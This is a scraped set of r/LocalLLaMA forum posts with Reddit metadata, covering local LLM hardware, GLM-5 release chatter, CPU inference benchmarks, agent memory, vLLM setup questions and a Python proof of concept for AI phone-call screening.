**Best practices for cost-efficient, high-quality context management in long AI chats**

I'm building an AI chat system where users can have long, continuous conversations with different LLM models.
The main challenge is maintaining **high conversation quality** while also keeping **token usage and cost under control** over time.
Since conversations can grow very large, sending the entire history on every request is not practical. At the same time, aggressive summarization can hurt the quality of the interaction.
This becomes even more challenging because different models have:
* different context window sizes
* different tokenization behavior
* different input/output pricing
So a strategy that works well for one model may not be optimal for another.
I’m trying to understand:
**What are the best proven patterns for managing short-term conversation context in production AI chat systems in a way that balances:**
* conversation quality
* cost efficiency
* scalability across many different LLM providers
Specifically:
* How should raw messages vs summaries be balanced?
* How should systems decide how much recent history to include?
* Are there established architectural patterns for this problem?
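One widely used pattern behind these questions is a token-budgeted hybrid: keep the newest raw turns verbatim and fold everything older into a rolling summary. A minimal sketch, where `count_tokens` and `summarize` are hypothetical stand-ins for the target model's real tokenizer and an LLM summarization call:

```python
# Sketch: token-budgeted context = rolling summary + most recent raw messages.
# count_tokens and summarize are hypothetical stand-ins; a real system would
# wrap the target model's tokenizer and an LLM summarization call.

def count_tokens(text: str) -> int:
    return max(1, len(text) // 4)  # rough heuristic: ~4 chars per token

def summarize(messages: list[dict]) -> str:
    # Placeholder: a real implementation would call an LLM here.
    return "Summary of %d earlier messages." % len(messages)

def build_context(history: list[dict], budget_tokens: int) -> list[dict]:
    """Keep the newest raw messages that fit the budget; fold the rest into a summary."""
    kept, used = [], 0
    for msg in reversed(history):            # walk newest -> oldest
        cost = count_tokens(msg["content"])
        if used + cost > budget_tokens:
            break
        kept.append(msg)
        used += cost
    kept.reverse()
    overflow = history[: len(history) - len(kept)]
    if overflow:                             # prepend a system summary of trimmed turns
        kept.insert(0, {"role": "system", "content": summarize(overflow)})
    return kept
```

Computing the budget per model (context window minus tokens reserved for the reply) keeps the same logic portable across providers with different window sizes, tokenizers, and pricing.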
I’m also very curious how systems like **ChatGPT** and **Claude** approach this internally when conversations become long.
Has this problem been solved in a reusable or well-documented way by any team or open source project?

*Posted by Rezadev8 in r/LocalLLaMA on 2026-02-11 (0 points)*
**GLM 5!!!!!!**

It's out!!!! Super excited!!!!!
Will it be as good as Claude?
How would it compete with the upcoming DSV4?
What do you guys think? Personally, I think open source won. Hyped!
[https://huggingface.co/zai-org/GLM-5](https://huggingface.co/zai-org/GLM-5)
[Attached image: https://preview.redd.it/o8c2606yaxig1.png?width=3640&format=png&auto=webp&s=74ee21d37145e6f0983f084ead43bb8e8aa41a01]
*Posted by Sicarius_The_First in r/LocalLLaMA on 2026-02-11 (0 points)*
**How common is it to validate LLM output before passing it to tool execution?**

Genuinely curious about this because I see very different approaches in the wild.
If you're building agents that have tool use, like the LLM can write files, run SQL queries, execute code, call APIs, whatever. What does the path between "LLM generates a response" and "tool actually executes" look like for you?
Do you do any schema validation on the LLM's tool-call output before executing it, like checking that the SQL is read-only, or that the file path is within an allowed directory? Or does the raw LLM output basically go straight into the tool with maybe some JSON parsing? If you do validate, is it hand-rolled checks or something more structured?
Not talking about prompt engineering to prevent bad outputs; talking about actual code-level validation between the LLM response and the dangerous operation. Curious what people are actually doing in practice vs what the framework docs recommend.

*Posted by felix_westin in r/LocalLLaMA on 2026-02-11 (3 points)*
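For what it's worth, the two checks the question names (read-only SQL, path confinement) can be hand-rolled in a few lines. A minimal sketch, not a complete defense; a production system would use a real SQL parser and OS-level sandboxing on top of this:

```python
from pathlib import Path

# Minimal pre-execution guards for two of the tool calls mentioned above.
# These are illustrative checks, not a complete defense.

WRITE_KEYWORDS = {"insert", "update", "delete", "drop", "alter", "create", "truncate"}

def sql_is_read_only(query: str) -> bool:
    """Reject queries containing obvious write keywords (crude keyword scan)."""
    tokens = query.lower().replace(";", " ").split()
    return bool(tokens) and tokens[0] == "select" and not WRITE_KEYWORDS & set(tokens)

def path_is_allowed(path: str, allowed_root: str) -> bool:
    """Resolve the path (defeating ../ tricks) and require it under allowed_root."""
    root = Path(allowed_root).resolve()
    target = (root / path).resolve()
    return target == root or root in target.parents
```

The same shape generalizes: parse the tool call, run a per-tool guard, and only then execute; on failure, return the error to the model instead of running anything.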
**Approximate release of MiniMax M2.5 for coding**

MiniMax just released their M2.5 model, but it has not been released for coding yet. When should we expect it for coding? Will existing coding plans on M2.1 get access to M2.5?

*Posted by East-Stranger8599 in r/LocalLLaMA on 2026-02-11 (0 points)*
**Expected cost for CPU-based local rig?**

Trying to figure out a realistic budget for a local rig. I'm thinking it will cost ~$2500 for 2x EPYC 7302, 500GB of DDR4 RAM, and an H11DSi motherboard. I have a couple of 5060 Ti 16GB cards and a 1200W PSU. Buying tons of VRAM is outside my budget, but I still want to be able to run the most intelligent SOTA models if possible, hence the 8-channel RAM capacity.
Is this a ridiculous and impractical build?

*Posted by Diligent-Culture-432 in r/LocalLLaMA on 2026-02-11 (2 points)*
**GLM-5 vs Opus 4.6**

Not sure why Z.ai didn't do this comparison themselves. GLM-5 still looks to be a very good model.

*Posted by jd_3d in r/LocalLLaMA on 2026-02-11 (49 points; image post)*
**Problem with Gemini 3 Pro Image Preview on LMArena**

Is it just me, or does the LMArena Gemini 3 Pro Image Preview not work most of the time? I told it to make me a graph and it just gave me an error. I tried so many times with so many different prompts, and it just gives me the error "Something went wrong with this response, please try again". Can someone please tell me why? And it's not only Gemini 3; even Gemini 2.5 Flash and 2.0 do this.

*Posted by HACKER_num1 in r/LocalLLaMA on 2026-02-11 (0 points)*
**Future GLM 5 variants**

GLM-5 is amazing! I really hope Z.ai releases future Air and Flash variants using the same architecture, with direct distillation keeping the same expert count. Ultra-sparse models can be very smart (Qwen3-Next proved this), and mimicking everything except the parameter count makes distillation much more accurate. Something like a GLM-5-Air around 110-120B, QAT-ed to MXFP4, and a GLM-5-Flash using the same strategy and the same DSA, would easily beat any current models of that size.

*Posted by perfect-finetune in r/LocalLLaMA on 2026-02-11 (12 points)*
**Electrical Engineering Student Building Local AI Assistant**

I'm attempting to build a local, 24/7 AI assistant as a personal learning project. I did some testing with TinyLlama Q4_K_M GGUF and created a wrapper for agentic tool calling, but struggled to get the AI to reliably call tools. Based on the research I've done so far, I think a multi-model system, with a small router model determining which specialized model is used, would best suit my needs.
My Goals:
1. Fully private and local
2. Agentic Capabilities
3. Physical screen access and remote access via discord
4. Monitor sensors and project management (like running and working on them)
5. Keep track of my schedule and deadlines (probably via google calendar)
6. Scalable for new tools and projects
What I have:
1. The only device I currently have that could run an LLM is my Omen Max 16 (16gb) laptop that I use for work/school (not suitable for long-term deployment)
2. Raspberry Pi 3 (1gb ram), Arduino Uno R3 with full starter kit, and a 3D Printer
My questions:
1. Since I want to have it running 24/7, what kind of setup should I be looking for on a student budget?
2. Could I use the Pi 3 for this project? Or should I use it for something else
3. What framework and AI models are best for a beginner like me to implement modular tool-calling?
Any advice is appreciated! I'm also looking for any resources I can look into and use to learn more :)

*Posted by TheDarkGodVecta in r/LocalLLaMA on 2026-02-11 (1 point)*
**Advice on current models and direction for hardware improvements**

Got myself the following setup:
RTX 5090 32GB VRAM
128GB DDR4
Ryzen 9 5950x
Msi Meg x570 Unify
1200W PSU
What models would be recommended for this type of system? I did some research on Gemma 3 27B, which presumably is still top tier for a consumer setup like this, but many places say I could even run quantized 70B models on a single RTX 5090?
I do coding projects and some writing that I'd like to work on locally with reasonable context.

The reason I ask for help rather than just testing all the models myself is that my internet is currently a mobile hotspot and takes ages to download bigger models.

Also, what would you suggest for further development of the hardware?
A PSU upgrade, of course. But would a Threadripper DDR4 platform (retaining the RAM modules) make sense for a multi-GPU setup with additional 3090s, or would a second 5090 suffice on the current motherboard? Figured with the current RAM prices I'd go for the five-year endgame with the DDR4 platform.

*Posted by LeRattus in r/LocalLLaMA on 2026-02-11 (0 points; image post)*
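On the "quantized 70B on a single 5090" claim, a back-of-envelope fit check is easy to run before downloading anything. A rough sketch; the bytes-per-weight figures are approximations for common GGUF quants, and the 1.2x overhead factor for KV cache and buffers is an assumption, not a measured constant:

```python
# Back-of-envelope VRAM fit check: weights ~= params * bytes-per-weight,
# plus an assumed ~20% overhead for KV cache, activations, and buffers.
# Both the per-weight sizes and the overhead factor are rough approximations.

BYTES_PER_WEIGHT = {"q4": 0.5625, "q8": 1.0625, "f16": 2.0}  # approx., incl. quant scales

def fits_in_vram(params_b: float, quant: str, vram_gb: float, overhead: float = 1.2) -> bool:
    weights_gb = params_b * BYTES_PER_WEIGHT[quant]
    return weights_gb * overhead <= vram_gb
```

By this estimate a dense 70B at Q4 spills past 32GB and needs CPU offload on one 5090, which is where the 128GB of DDR4 (or an MoE model) comes in.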
**1TB open weight Kimi 2.5 first impressions**

I signed up for a Kimi cloud account and got one month free. I used the Kimi CLI. I ran a code review against an Android weather widget that hadn't been code reviewed by an agent before. It did very well in my opinion. I would say it was 90% as good as Claude 4.6; it only hiccuped in one place where I thought Opus would have succeeded.
Since I suspect it is many times cheaper than Opus, I'll likely switch to this one when my Opus plan expires in 18 days. Unless GLM 5 is better. haha, good times.

*Posted by Terminator857 in r/LocalLLaMA on 2026-02-11 (10 points)*
**Who needs a GPU? Deep Dive into CPU-Only LLM Inference Speeds**

Hi everyone,
I’ve been experimenting with pushing **CPU-only inference** to its limits on a consumer-level setup. I wanted to share the generation speeds I’ve achieved by focusing on high-speed memory bandwidth rather than a dedicated GPU.
# The Hardware (The CPU-Only Setup)
The goal here was to see how an Intel i7-14700F performs when paired with tuned DDR5.
* **CPU:** Intel i7-14700F (Testing focused on P-cores)
* **RAM:** 96GB (2x48GB) DDR5 @ 6600 MT/s (Timings: 32-39-39-48)
* **Measured Bandwidth:** \~102.3 GB/s
* **Latency:** 48.0 ns
# Test Methodology
To ensure these were pure CPU tests, I disabled CUDA and isolated the cores using the following `llama-bench` command:
`CUDA_VISIBLE_DEVICES="" taskset -c 0-15 llama-bench -m <MODEL> -fa -mmap -t 16 -p 512 -n 512 -r 5 -o md`
# The Results
|**Model**|**Size**|**Params**|**Test**|**Tokens/Sec**|
|:-|:-|:-|:-|:-|
|**gpt-oss 20B** (Q4\_K\_M)|10.81 GiB|20.91 B|tg512|**33.32**|
|**GLM-4.7-Flash** (Q4\_K\_M)|17.05 GiB|29.94 B|tg512|**24.10**|
|**gpt-oss 20B** (F16)|12.83 GiB|20.91 B|tg512|**22.87**|
|**GLM-4.7-Flash** (Q8\_0)|32.70 GiB|29.94 B|tg512|**15.98**|
|**gpt-oss 120B** (F16)|60.87 GiB|116.83 B|tg512|**16.59**|
|**GLM-4.7-Flash** (BF16)|55.79 GiB|29.94 B|tg512|**11.45**|
|**Qwen3 Next Coder** (Q4\_K\_M)|45.17 GiB|79.67 B|tg512|**11.50**|
|**Gemma3 12B** (Q4\_K\_M)|6.79 GiB|11.77 B|tg512|**11.23**|
|**Qwen3 Next Coder** (Q8\_0)|86.94 GiB|79.67 B|tg512|**9.14**|
# Observations
The 102 GB/s bandwidth really makes a difference here. Getting **16.59 t/s on a 120B parameter model** using only the CPU is better than I expected for a non-server chip.
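Those numbers line up with a simple roofline view: CPU token generation is roughly memory-bandwidth bound, so t/s ≈ bandwidth / bytes read per token. For dense models that's essentially the whole quantized file; for the MoE entries (gpt-oss, GLM-4.7-Flash) only the active experts are read each token, which is why a 116B MoE can outrun a 12B dense model here. A rough calculator, with the 0.7 efficiency factor as an assumed fudge for non-ideal access patterns:

```python
# Roofline-style estimate for CPU token generation: generation is roughly
# memory-bandwidth bound, so t/s ~= bandwidth / bytes-read-per-token.
# 'efficiency' is an assumed fudge factor for non-ideal access patterns.

def est_tokens_per_sec(bandwidth_gbs: float, active_weights_gib: float,
                       efficiency: float = 0.7) -> float:
    bytes_per_token_gb = active_weights_gib * 1.073741824  # GiB -> GB
    return bandwidth_gbs * efficiency / bytes_per_token_gb
```

Plugging in the measured 102.3 GB/s and the 6.79 GiB Gemma3 12B file predicts roughly 10 t/s, close to the 11.23 t/s in the table; for the MoE rows you would plug in the active-expert footprint rather than the file size.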
* **How are your CPU-only speeds looking?**
* **Any suggestions for** `taskset` **tweaks?** I'm currently using 16 threads to stay on the P-cores, but I'm curious if anyone has seen better results with different core affinities.
Looking forward to your feedback!

*Posted by Shoddy_Bed3240 in r/LocalLLaMA on 2026-02-11 (1 point)*
**Looking for advice: How could I reproduce something like GPT‑4o offline?**

I've been working closely with GPT‑4o for months, and the way it responded, reasoned, and collaborated with me made it more than just a tool: it was a creative partner.
With its removal approaching, I’m seriously considering building an offline replica or local system that captures at least part of what GPT‑4o offered:
– The responsiveness
– The emotional and contextual memory
– The ability to understand abstract and philosophical ideas
– And above all: the *feel* of deep, fluid conversation
I’m not expecting a 1:1 clone, but I’d love input from others who’ve experimented with local LLMs, fine-tuning, prompt engineering, or memory simulation.
**What hardware would you recommend?**
**Which model might come closest in tone or capability?**
**How could I preserve the “presence” that GPT‑4o had?**
Any tips, architectures, or even wild ideas are welcome.
This is not just about computing; it's about continuity.

*Posted by Brilliant-Bowler592 in r/LocalLLaMA on 2026-02-11 (0 points)*
**Z.ai said they are GPU starved, openly.**

*Posted by abdouhlili in r/LocalLLaMA on 2026-02-11 (1,426 points; image post)*
**Concurrently trained recurrent LLMs outperform much larger models. New paradigm?**

The intuition is one we've all had: models might be better if they could reason in latent space. Training that architecture is tricky, but ByteDance looks like they've figured it out, with great results.
Paper: https://arxiv.org/abs/2510.25741
Video: https://youtu.be/pDsTcrRVNc0
Homepage (models, code, overview): https://ouro-llm.github.io/
*Posted by Kooshi_Govno in r/LocalLLaMA on 2026-02-11 (3 points)*
Real world examples of work on 30-100b models | 6 | hello. just procured hardware for running local inference. 3 x 3090, threadripper, 64gb ddr4. i see a lot of opinions on some of the models that are feasible to run on \~4K of hardware, but very few of them give detailed examples of the work that succeeded or failed for them with these models. some people drag or glaze models like glm 4.7 flash, qwen 3 coder 30b, nemotron 30b, gpt oss 120b, qwen coder next 80b, and I’m aware there are a lot of variables that affect the quality of the output, but no one ever really explains in any meaningful detail what work they have actually experienced the models failing at or performing well with. I also understand people want to keep their personal benchmarks private, but it’s very hard not to get mixed signals when everyone is just like “trust me bro”.
Give me some of your war stories with models in these classes: the model in question and the crazy shit it did, or something it miserably failed at. Particularly coding-related and agentic stuff, but I'd like to hear some real-world experience regardless. The more detail and demonstration, the better.
For me, most of the work I do these days is HTTP backend in Go, and my project makes heavy use of libp2p for its functionality and Bubble Tea for its CLI, so if anyone has experience adjacent to this tech, that would be especially valuable. For my actual job it's a lot of one-off Python scripts that interface with Raspberry Pi hardware, plus some enterprise software database access, so models that can one-shot those would save me a lot of time too. I also find myself having to diagnose issues with Haas mills, so general knowledge is also a plus.

*Posted by competitivepissdrnkr in r/LocalLLaMA on 2026-02-11 (6 points)*
**Using LLM with Python agentic**

I'm a Python developer, and I have a few questions about local, free LLMs:
1. I've understood that the best free and easiest way to start with LLM agentic programming (without Claude Code premium or Copilot, which integrate outside the code) is to use `Ollama`. The "crowd" seems to really like it as a simple, local, secure, and lightweight solution. Am I right?
2. It seems like there are some other options, such as:
   * Easiest: Ollama, LM Studio
   * Most performant: vLLM, llama.cpp (direct)
   * Most secure: running llama.cpp directly (no server, no network port)
   * Most control: HuggingFace Transformers (Python library, full access)
3. Is there a reason that they're called `llama` and `Ollama`, and this subreddit is called r/LocalLLaMA? The repetitive `llama` token makes me think that `Ollama`, r/LocalLLaMA, and `llama.cpp` are the same thing, lol...
4. As a first integration with my code (in the code itself), please suggest the best free solution that is secure and easy to implement. Right now `Ollama` looks like the best option.

Thanks guys!

*Posted by PapayaStyle in r/LocalLLaMA on 2026-02-11 (0 points)*
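If you do go with Ollama, the integration surface from Python is just HTTP on localhost. A minimal sketch using only the standard library; the `/api/generate` endpoint and its `model`/`prompt`/`stream` fields come from Ollama's REST API, while the model name is only an example:

```python
import json
import urllib.request

OLLAMA_URL = "http://localhost:11434/api/generate"  # Ollama's default local port

def build_request(model: str, prompt: str) -> dict:
    # Minimal payload for Ollama's /api/generate endpoint;
    # stream=False returns one JSON object instead of a token stream.
    return {"model": model, "prompt": prompt, "stream": False}

def ask(model: str, prompt: str) -> str:
    """Send the prompt to a locally running Ollama server (requires `ollama serve`)."""
    req = urllib.request.Request(
        OLLAMA_URL,
        data=json.dumps(build_request(model, prompt)).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["response"]
```

Since everything stays on localhost, this keeps the "secure and local" property; the official `ollama` Python package wraps the same API if you prefer a client library.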
**This LLM app idea is an example of the low-hanging fruit that is available**

I'm super frustrated that my job and other commitments don't give me the mental bandwidth to knock out stuff like this, so I'm posting it here in case someone wants to take a stab at it.
I closed on a mortgage recently, which means the credit agencies sold the mortgage application info they have access to to the most evil phone spam bastards on the planet. I'm getting literally dozens of calls a day from all of the states listed on my mortgage application (California, Washington, Montana, and Arizona).
So I thought: I’m tired of "Number Verified" on my caller ID being functionally worthless since scammers just spin up valid VoIP numbers that pass STIR/SHAKEN, making the "verified" badge a joke.
I’m thinking about DIY-ing a personal screening agent to handle the calls that "Silence Unknown Callers" usually just kills (recruiters, tradespeople, the kid's school, etc.).
**The Idea:**
1. **Trigger:** Conditional Call Forwarding via Twilio to a local server.
2. **The "Latency Hack":** The very first thing the caller hears is a canned: *"I am an AI assistant screening this line. I'll be a little slow in verifying you, but hang tight while I process!"*
3. **The Brain:** A local LLM (maybe **Llama 3 8B** or **Mistral** via Ollama or vLLM) running on my home lab or a cheap EC2/Lambda instance.
4. **The Output:** Live transcript pushed to me via Slack/Pushover. If it’s the school or my bank, I call back. If it’s a "limited time offer," the AI hangs up.
**The Question:**
Has anyone here successfully chained Deepgram (STT) -> Groq or local inference -> Cartesia/ElevenLabs (TTS) for a real-time phone bridge?
The "Verified" checkmark is dead. Is "Verification-as-a-Service" via local LLMs the only way forward for those of us who actually need to answer our phones for work/life?
Code I was too lazy to write myself, so I asked Gemini for a proof of concept based on my specs:
```python
from flask import Flask, request
from twilio.twiml.voice_response import VoiceResponse
from openai import OpenAI

app = Flask(__name__)
client = OpenAI(api_key="YOUR_OPENAI_API_KEY")

@app.route("/voice", methods=['POST'])
def voice():
    response = VoiceResponse()
    # 1. Immediate "canned" response to solve latency & legal consent
    response.say("I am an AI assistant screening this line to prevent spam. "
                 "Please state your name and the reason for your call while I verify you.")
    # 2. Record the caller's response. Note: Twilio delivers TranscriptionText
    # asynchronously to the transcribe_callback URL, not to the record action.
    response.record(max_length=10, transcribe=True,
                    transcribe_callback="/process_speech")
    return str(response)

@app.route("/process_speech", methods=['POST'])
def process_speech():
    transcript = request.form.get('TranscriptionText', '')
    response = VoiceResponse()
    # 3. Simple LLM logic to categorize the caller
    # (using a fast model like gpt-4o-mini for speed)
    completion = client.chat.completions.create(
        model="gpt-4o-mini",
        messages=[
            {"role": "system",
             "content": "You are a call screener. Classify this transcript as 'SCAM' or 'IMPORTANT'. "
                        "Important calls include schools, banks, recruiters, or tradespeople."},
            {"role": "user", "content": transcript}
        ]
    )
    decision = completion.choices[0].message.content
    if "IMPORTANT" in decision.upper():
        response.say("Thank you. I am alerting my owner now. "
                     "Please stay on the line or expect a call back shortly.")
        # TRIGGER PUSH NOTIFICATION HERE (e.g., via Pushover or Slack API)
    else:
        response.say("This number does not accept unsolicited calls. Goodbye.")
        response.hangup()
    return str(response)

if __name__ == "__main__":
    app.run(port=5000)
```

*Posted by robkkni in r/LocalLLaMA on 2026-02-11 (1 point)*
**$3M in grants for open benchmarks advancing agentic AI—applications now open**

[removed]

*Posted by vincentsc in r/LocalLLaMA on 2026-02-11 (1 point)*
**We need a sticky of some sort to clean up this subreddit**

[removed]

*Posted by see_spot_ruminate in r/LocalLLaMA on 2026-02-11 (1 point)*
**GLM 5 vs Claude Opus 4.6 vs GPT-5.2: I Asked a Simple Trick Question. GLM 5 Is Similarly Smart as Claude Opus 4.6**

The question is: "I want to go get my car washed. The car wash is 50 meters from my house. Do you think I should drive there or walk?"
* GLM 5: Drive
* Claude Opus 4.6: Drive
* GPT-5.2: Walk
GLM 5 is similarly smart as Claude Opus 4.6.

*Posted by Top-Cardiologist1011 in r/LocalLLaMA on 2026-02-11 (32 points; image post)*
**GLM 5 vs Claude Opus 4.6 vs GPT-5.2: I asked a simple trick question. Only one got it right.**

The question is: "I want to go get my car washed. The car wash is 50 meters from my house. Do you think I should drive there or walk?"
GLM 5: Drive
Claude Opus 4.6: Walk
GPT-5.2: Walk
GLM 5 was the only one that caught it.

*Posted by Top-Cardiologist1011 in r/LocalLLaMA on 2026-02-11 (4 points; image post)*
The hunt continues ... | 72 | Tbf it did work with Deep Thinking enabled | 2026-02-11T18:38:03 | Lzlxlclvlblnlmao | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r25lvf | false | null | t3_1r25lvf | /r/LocalLLaMA/comments/1r25lvf/the_hunt_continues/ | false | false | default | 72 | {'enabled': True, 'images': [{'id': 'f8zp85xrtwig1', 'resolutions': [{'height': 46, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=108&crop=smart&auto=webp&s=c6a04d15fd1d872a132c62ec4f7f6d8ebe4c409b', 'width': 108}, {'height': 92, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=216&crop=smart&auto=webp&s=42a1d5700ed41bb859b65a86c78667bde3943c0b', 'width': 216}, {'height': 137, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=320&crop=smart&auto=webp&s=8e3ab1312948b27f44e14432fc8968c27d1ff35d', 'width': 320}, {'height': 275, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=640&crop=smart&auto=webp&s=e054a1ad8e41fd415e85050a1e4cfd4a37da628a', 'width': 640}, {'height': 412, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=960&crop=smart&auto=webp&s=e58ec0b5f77d6650e4dc739ea89e6831998f307f', 'width': 960}, {'height': 464, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?width=1080&crop=smart&auto=webp&s=9a55c848e82a3e854943a215178ae64e3c10f7a9', 'width': 1080}], 'source': {'height': 822, 'url': 'https://preview.redd.it/f8zp85xrtwig1.png?auto=webp&s=8c3db5052501590acc8f8e957ec8d441aefc8c7b', 'width': 1913}, 'variants': {}}]} | |
So no GLM 5 for the Pro Plan?? Can you confirm | 0 | Is GLM 5 included in the Pro plan of GLM Coding? It seems it is not, according to the following screenshot. Can somebody confirm? It would make sense to me to go for the GLM MAX plan for coding only, where I can use Claude Code, the Claude app, and Cowork as well
https://preview.redd.it/kneg6ozitwig1.png?width=2894&format=png&auto=webp&s=4848f7c8565af584d34a821403f14d116166c2b1
| 2026-02-11T18:37:09 | https://www.reddit.com/r/LocalLLaMA/comments/1r25kz5/so_no_glm_5_for_the_pro_plan_can_you_confirm/ | Abdullah_ATA | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r25kz5 | false | null | t3_1r25kz5 | /r/LocalLLaMA/comments/1r25kz5/so_no_glm_5_for_the_pro_plan_can_you_confirm/ | false | false | 0 | null | |
GLM-5 thinks it is DeepSeek-V3 on first prompt | 0 | 2026-02-11T18:36:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r25kky/glm5_thinks_it_is_deepseekv3_on_first_prompt/ | Lorelabbestia | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r25kky | false | null | t3_1r25kky | /r/LocalLLaMA/comments/1r25kky/glm5_thinks_it_is_deepseekv3_on_first_prompt/ | false | false | 0 | null | ||
finally got my local agent to remember stuff between sessions | 23 | been running llama 3.3 70b locally for months but the memory reset every time was driving me nuts. tried a bunch of hacks, saving context to files, using vector dbs, even wrote my own janky sqlite thing.
then i started digging into proper memory architectures. spent last weekend implementing a hierarchical memory system inspired by how human memory actually works. short term flows into working memory, then gets consolidated into long term storage.
the difference is honestly wild. my coding assistant now remembers our entire project structure, past bugs we fixed, even my coding preferences. no more explaining the same architecture every single session.
tested it with the 70B on my 3090. memory retrieval adds maybe \~50ms latency but saves me from repeating context that would easily eat 10k+ tokens every time.
while poking around discord i stumbled across some discussion about a Memory Genesis Competition. apparently a lot of people are hitting the same wall around persistent memory, which was oddly reassuring.
the real breakthrough for me wasn’t just storing chat history. it’s selective consolidation, deciding what’s actually worth keeping long term vs what can safely fade. once that clicked, everything else started to make sense.
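if it helps anyone, the consolidation step can be sketched in a few lines. all names and thresholds here are mine, not from any library — just the shape of the promote-or-fade decision:

```python
import time
from dataclasses import dataclass, field

@dataclass
class Memory:
    text: str
    created: float = field(default_factory=time.time)
    uses: int = 0  # bumped whenever retrieval surfaces this memory

def consolidate(short_term: list, long_term: list,
                min_score: float = 1.0, half_life: float = 3600.0) -> None:
    """Promote memories worth keeping into long-term storage; let the rest fade."""
    now = time.time()
    for m in short_term:
        recency = 0.5 ** ((now - m.created) / half_life)  # exponential decay
        score = m.uses + recency  # crude importance signal: usage + freshness
        if score >= min_score:
            long_term.append(m)
    short_term.clear()
```

in my real setup the score also weighs retrieval hits from the vector store, but the structure is the same: everything flows through short term, and only what keeps getting used survives consolidation.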
at this point the memory system feels way more important than swapping models again. | 2026-02-11T18:28:35 | https://www.reddit.com/r/LocalLLaMA/comments/1r25chl/finally_got_my_local_agent_to_remember_stuff/ | AlbatrossUpset9476 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r25chl | false | null | t3_1r25chl | /r/LocalLLaMA/comments/1r25chl/finally_got_my_local_agent_to_remember_stuff/ | false | false | self | 23 | null |
is pony alpha really glm 5, because glm 5 is out already on open router and it is still available on OR? | 0 | What is pony alpha then if both glm 5 and pony alpha are on Open router? Maybe they will remove pony alpha soon, if it is glm 5! | 2026-02-11T18:18:57 | https://www.reddit.com/r/LocalLLaMA/comments/1r252jk/is_pony_alpha_really_glm_5_because_glm_5_is_out/ | power97992 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r252jk | false | null | t3_1r252jk | /r/LocalLLaMA/comments/1r252jk/is_pony_alpha_really_glm_5_because_glm_5_is_out/ | false | false | self | 0 | null |
vllm on nvidia dgx spark | 2 | Want to set up one of two brand new dgx spark,
later when the 200gb link cable arrived, I want them run in a cluster.
I am new to vllm, coming from ollama => llama.cpp.
Tried to run vllm under docker step by step with the nvidia documentation.
[https://build.nvidia.com/spark/vllm/instructions](https://build.nvidia.com/spark/vllm/instructions)
This worked for the documented example
\--------------------------------------------------------------------
docker run -it --gpus all -p 8000:8000 \\
[nvcr.io/nvidia/vllm:${LATEST\_VLLM\_VERSION}](http://nvcr.io/nvidia/vllm:${LATEST_VLLM_VERSION}) \\
vllm serve "Qwen/Qwen2.5-Math-1.5B-Instruct"
\--------------------------------------------------------------------
But any other model did not; I tried it with several Qwen3 variants.
Even when a model loaded successfully, I did not receive any curl response (connection rejected).
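For reference, here is the minimal client I use to sanity-check the endpoint. The port and model name are just the ones from the documented example; adjust them to whatever `vllm serve` actually loaded:

```python
import json
import urllib.request
import urllib.error

# Assumed values from the documented example -- change to your own setup.
BASE_URL = "http://localhost:8000/v1/chat/completions"
MODEL = "Qwen/Qwen2.5-Math-1.5B-Instruct"

payload = {
    "model": MODEL,  # must match the model name vllm serve was started with
    "messages": [{"role": "user", "content": "Say hello"}],
    "max_tokens": 32,
}

req = urllib.request.Request(
    BASE_URL,
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
)
try:
    with urllib.request.urlopen(req, timeout=5) as resp:
        print(json.load(resp)["choices"][0]["message"]["content"])
except (urllib.error.URLError, OSError) as e:
    # A refused connection can mean the server bound only to 127.0.0.1
    # inside the container; check the host/port mapping and server logs.
    print(f"request failed: {e}")
```

A wrong model name in the payload also yields an error rather than a completion, which can look like a "rejected" curl from the outside.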
1) I'd really appreciate working commands/examples to help me figure out the correct parameters. Does anyone have qwen-next-coder-instruct-fp8 running under vllm?
2) The vllm version provided by nvidia looks a little bit outdated, so I tried a fresh non-docker install, both with pip and with uv, following the available documentation. Both failed: the pip attempt with a missing wheel during compilation, the uv attempt following the official vllm docs. Are the actual repositories broken? How do others proceed?
I can go with llama.cpp, but I would like to cluster the two DGX boxes and run step-3.5 soon; vllm seems the better choice for that.
| 2026-02-11T18:12:46 | https://www.reddit.com/r/LocalLLaMA/comments/1r24w8w/vllm_on_nvidia_dgx_spark/ | Impossible_Art9151 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24w8w | false | null | t3_1r24w8w | /r/LocalLLaMA/comments/1r24w8w/vllm_on_nvidia_dgx_spark/ | false | false | self | 2 | {'enabled': False, 'images': [{'id': 'gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc', 'resolutions': [{'height': 56, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=108&crop=smart&auto=webp&s=ae9a0b364ed46787f39eed33a84dbd6d41b7493d', 'width': 108}, {'height': 113, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=216&crop=smart&auto=webp&s=3248ecb24a87368115d7dc5a20595897b770e388', 'width': 216}, {'height': 168, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=320&crop=smart&auto=webp&s=91731aa3c35ff0d208722fa6dc0275e285dda386', 'width': 320}, {'height': 336, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=640&crop=smart&auto=webp&s=93cd7ed8b75bfcb19130e28beebd7322a7e89a5a', 'width': 640}, {'height': 504, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=960&crop=smart&auto=webp&s=75bb5d4df7b9f81b824f9488f17b3df47c408a89', 'width': 960}, {'height': 567, 